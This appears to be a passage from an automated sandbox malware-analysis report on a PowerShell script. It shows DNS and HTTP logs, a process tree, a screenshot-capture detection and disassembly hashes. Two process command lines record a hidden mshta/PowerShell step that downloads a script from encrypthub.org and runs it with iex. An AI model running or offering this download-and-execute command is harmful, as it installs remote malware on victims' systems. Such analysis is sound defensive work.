                                                        Jan 16, 2025 13:20:08.979434013 CET6358453192.168.2.41.1.1.1
                                                        Jan 16, 2025 13:20:09.282083988 CET53635841.1.1.1192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 16, 2025 13:20:07.683728933 CET192.168.2.41.1.1.10xc365Standard query (0)ident.meA (IP address)IN (0x0001)false
                                                        Jan 16, 2025 13:20:08.979434013 CET192.168.2.41.1.1.10xf216Standard query (0)encrypthub.orgA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 16, 2025 13:20:07.691412926 CET1.1.1.1192.168.2.40xc365No error (0)ident.me49.12.234.183A (IP address)IN (0x0001)false
                                                        Jan 16, 2025 13:20:09.282083988 CET1.1.1.1192.168.2.40xf216No error (0)encrypthub.org146.70.233.10A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • ident.me

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.44973049.12.234.1834437144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-16 12:20:08 UTC188OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6
                                                        Host: ident.me
                                                        Connection: Keep-Alive
                                                        2025-01-16 12:20:08 UTC220INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 16 Jan 2025 12:20:08 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 12
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        2025-01-16 12:20:08 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                        Data Ascii: 8.46.123.189


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:07:19:59
                                                        Start date:16/01/2025
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\worker.ps1"
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_PowerShellScreenShot, Description: Yara detected PowerShell ScreenShot, Source: 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:1
                                                        Start time:07:19:59
                                                        Start date:16/01/2025
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:2
                                                        Start time:07:20:04
                                                        Start date:16/01/2025
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1"
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:07:20:04
                                                        Start date:16/01/2025
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:07:20:06
                                                        Start date:16/01/2025
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close)
                                                        Imagebase:0x7ff7a7800000
                                                        File size:14'848 bytes
                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:07:20:07
                                                        Start date:16/01/2025
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:07:20:07
                                                        Start date:16/01/2025
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Executed Functions

                                                          Function 00007FFD9B85FFD1 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200117209.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DO_^
                                                          • API String ID: 0-4278511587
                                                          • Opcode ID: cb9342c3f650addb7f50666a591c88fa58f0eb8cf07e4290e090570a9dd57312
                                                          • Instruction ID: 79922c37488c50dde8d45eb4fa003f600c899bd12b9610c94dfd71ba79a165fe
                                                          • Opcode Fuzzy Hash: cb9342c3f650addb7f50666a591c88fa58f0eb8cf07e4290e090570a9dd57312
                                                          • Instruction Fuzzy Hash: D721F922E1F7954FE312577C9CB14F47BA0EF46650B1A41F7C0C8CB0E7E94868468346
                                                          Function 00007FFD9B861A7C Relevance: .5, Instructions: 538COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200117209.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01ae9dc2adf844742ac383494fb7b8eefbbf0e291ed11854ef4fb603e00b11d8
                                                          • Instruction ID: 0385864667adea94da3d2c0ffc81870d230f5af6c49175776b57ca70334354fe
                                                          • Opcode Fuzzy Hash: 01ae9dc2adf844742ac383494fb7b8eefbbf0e291ed11854ef4fb603e00b11d8
                                                          • Instruction Fuzzy Hash: 85F10421F0D64A8FE769BB6888617B877C2EF99304F5610B9D44DC72E7DE1CAD428342
                                                          Function 00007FFD9B85B8D5 Relevance: .2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200117209.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9dc9fae0050cdf4cbc9b17ad9a08cca9a110ef51b5788a95cefb84992bdf7cf1
                                                          • Instruction ID: c307d8a3fcbaf59ec5bb5723e15e7f26cf64893b49f916a6245fcf1e69f41445
                                                          • Opcode Fuzzy Hash: 9dc9fae0050cdf4cbc9b17ad9a08cca9a110ef51b5788a95cefb84992bdf7cf1
                                                          • Instruction Fuzzy Hash: 73412B71A0DB8C4FEB199F9C98265A97FF0FF6A710F0541AFD08983192DA64B905C782
                                                          Function 00007FFD9B85C053 Relevance: .1, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200117209.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b535cfe0e3e829379ef7aec7ab9fc36c35d8994eb503e0525c1a77f931b3539
                                                          • Instruction ID: 3a97be2b12305e4aca5d1d9ccc8c7b4c43969b5d38907008d32fa01d6af4ac40
                                                          • Opcode Fuzzy Hash: 3b535cfe0e3e829379ef7aec7ab9fc36c35d8994eb503e0525c1a77f931b3539
                                                          • Instruction Fuzzy Hash: 0631B231A08A4C8FDB58DF9CD849AE97BE4EBA9321F04426BD44DC3152DA70E555CB81
                                                          Function 00007FFD9B9231AE Relevance: .1, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200797841.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b920000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a6ccfb549ae0bd5a8a6222d3c05d418ea00c413f747384bbe596750fe5d002d7
                                                          • Instruction ID: a797a143ed38518e00d55467bb73305b3e997f62b1237a73e6cd1911965b0732
                                                          • Opcode Fuzzy Hash: a6ccfb549ae0bd5a8a6222d3c05d418ea00c413f747384bbe596750fe5d002d7
                                                          • Instruction Fuzzy Hash: 10315A22F1EA9D1FEBA9D6AC58716B577D2EF45620B0900BFD44EC71A3D904ED058381
                                                          Function 00007FFD9B85C0A1 Relevance: .1, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200117209.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aaf6c3c24f27ef9293ec41c6f3590e4c2fff956734a5da50938aab8fe2581e90
                                                          • Instruction ID: 2e7e2748e09c814998dd4c63c55ceeb96931062b5f918dd44c82385034434862
                                                          • Opcode Fuzzy Hash: aaf6c3c24f27ef9293ec41c6f3590e4c2fff956734a5da50938aab8fe2581e90
                                                          • Instruction Fuzzy Hash: 5B31E571A0D78C4FDB59DF98885A6E93FF0EF96321F0441ABD048C7162D7749806CB51
                                                          Function 00007FFD9B928C5D Relevance: .1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200797841.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b920000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6af80a9cedce6801f6a41383d67064a0e249f18f599cf78137b6b85958c936b3
                                                          • Instruction ID: 96155406a21db7c2f2de1ab21e9140c01f1773a92e884b3129440b52fce739d0
                                                          • Opcode Fuzzy Hash: 6af80a9cedce6801f6a41383d67064a0e249f18f599cf78137b6b85958c936b3
                                                          • Instruction Fuzzy Hash: 4801963171DA184FDB64EA5CA492AB473D1EB98711F14457FD00EC32D7DD25EC428781
                                                          Function 00007FFD9B854495 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200117209.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3119bc9c390f94c06d86a9b1a8efc13259af917fa0ac2223829a35d9c3588c95
                                                          • Instruction ID: b36aae27e5d888a95ef220e42b484a482a022e490769c52a72c05add46be52c9
                                                          • Opcode Fuzzy Hash: 3119bc9c390f94c06d86a9b1a8efc13259af917fa0ac2223829a35d9c3588c95
                                                          • Instruction Fuzzy Hash: FB01A73020CB0C4FD748EF4CE451AA5B3E0FB89320F10056DE58AC36A5D632E881CB45
                                                          Function 00007FFD9B926A82 Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200797841.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b920000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1765393b9db9c066d2b9ab70b19ddd704c262ae00d65fa0a5b56d9b1803b90b7
                                                          • Instruction ID: 9eac16d4b4417537897372be9bb431330a589ec1ed814f03d2928198bd07f2d3
                                                          • Opcode Fuzzy Hash: 1765393b9db9c066d2b9ab70b19ddd704c262ae00d65fa0a5b56d9b1803b90b7
                                                          • Instruction Fuzzy Hash: 6EF09A32B0E6098FE768EA5CE4518A873E0EF5532072640BAE05CC78A7DA26AC418784
                                                          Function 00007FFD9B92861D Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200797841.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b920000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8c17c002f703f408033d7f2965c25c7f44ec2496872900843d1bcba00ea7ade4
                                                          • Instruction ID: fed6c478f9595e7611811e9e8da1d5fc6759d36257931ee0fea6ef2005394821
                                                          • Opcode Fuzzy Hash: 8c17c002f703f408033d7f2965c25c7f44ec2496872900843d1bcba00ea7ade4
                                                          • Instruction Fuzzy Hash: FBF05E32B0E6498FD768EA5CE4958A877E0EF45320B2500BAE05DC75B7DA29EC45C784
                                                          Function 00007FFD9B928BF4 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200797841.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b920000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6fdb24accab0722571bed3bb5ef8d0f5c0c46636f6312b51a071c77a1a1207e7
                                                          • Instruction ID: 4607a130a8225cf47e6e338fe8c1305b844966f3e9ef5ad5314255405109b282
                                                          • Opcode Fuzzy Hash: 6fdb24accab0722571bed3bb5ef8d0f5c0c46636f6312b51a071c77a1a1207e7
                                                          • Instruction Fuzzy Hash: 36F0A73131CF044FD744EE1DD445661B3D0FBA8311F10462FE44DC3691DA25E4818782
                                                          Function 00007FFD9B926D30 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200797841.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b920000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a97536bd10fda738445c3134aebe24e0ef9fced8a2de232ff5175029d95f977
                                                          • Instruction ID: 602df8d0469e9b25bdef2aeed74bf30e5267d1dd703afaedacc0b210bffd6497
                                                          • Opcode Fuzzy Hash: 5a97536bd10fda738445c3134aebe24e0ef9fced8a2de232ff5175029d95f977
                                                          • Instruction Fuzzy Hash: F0F0BE32A0E5098FD768EA5CE4548A877E0EF0432071100BAE01DCB4A3DA26AC40CB54
                                                          Function 00007FFD9B85BFC0 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200117209.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 779b0ae880074f85a378efc215b491bb1d86834d2d3bc5b10e2822e70142baf9
                                                          • Instruction ID: d9cfcb94fd42000809b7b02595dc87a5dcda850f76ab10cb42624b770faecda9
                                                          • Opcode Fuzzy Hash: 779b0ae880074f85a378efc215b491bb1d86834d2d3bc5b10e2822e70142baf9
                                                          • Instruction Fuzzy Hash: 04F052308082C98FD706CF68C80A5D87FA0EF2622070902EBD40CCB1B3CB399806CB82
                                                          Function 00007FFD9B9231F6 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200797841.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b920000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6cb3be3b2ac985d67b20a079a8ac4b14ea34bdedbfe022bb8ee7f6ba3a6993d6
                                                          • Instruction ID: a7b5c206c107dfdd7015b3e4a338cc83dc202efa6403da5cb4e56e10e78b4b42
                                                          • Opcode Fuzzy Hash: 6cb3be3b2ac985d67b20a079a8ac4b14ea34bdedbfe022bb8ee7f6ba3a6993d6
                                                          • Instruction Fuzzy Hash: FDE09233F1F9594FEB68C69C94A45B4B7D0EF682B1715007BE51EC7260CA05AD458740
                                                          Function 00007FFD9BCD3C18 Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4206086515.00007FFD9BCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9bcd0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66fd0435ab88fe0b834f9dc3ebed3d3e9c34f0ee032a1d36985e88662cf95a25
                                                          • Instruction ID: 29949e070e46af85712a6f0d11db49d8604a1ab205de7572217d66584c826773
                                                          • Opcode Fuzzy Hash: 66fd0435ab88fe0b834f9dc3ebed3d3e9c34f0ee032a1d36985e88662cf95a25
                                                          • Instruction Fuzzy Hash: F3E0D823F0EC5D0EE7B5A6AC28391F862D0DFD466174503B7E85EC3191DD04AD204781

                                                          Non-executed Functions

                                                          Function 00007FFD9B8600B9 Relevance: 1.8, Strings: 1, Instructions: 581COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4200117209.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #>
                                                          • API String ID: 0-887891002
                                                          • Opcode ID: 7af92f839127182429fb5686a56c1342af838b3e4d7410d6dc00b9d9beb43265
                                                          • Instruction ID: ac3961beceda2220ff78dacf649f6093f79858e6482bfdfce3f951e37b1b99ca
                                                          • Opcode Fuzzy Hash: 7af92f839127182429fb5686a56c1342af838b3e4d7410d6dc00b9d9beb43265
                                                          • Instruction Fuzzy Hash: 1BE1F357B4C0624DD31573BE79659FD6B01CFC1336B0846B7D29DCE0D7AC88248A86EA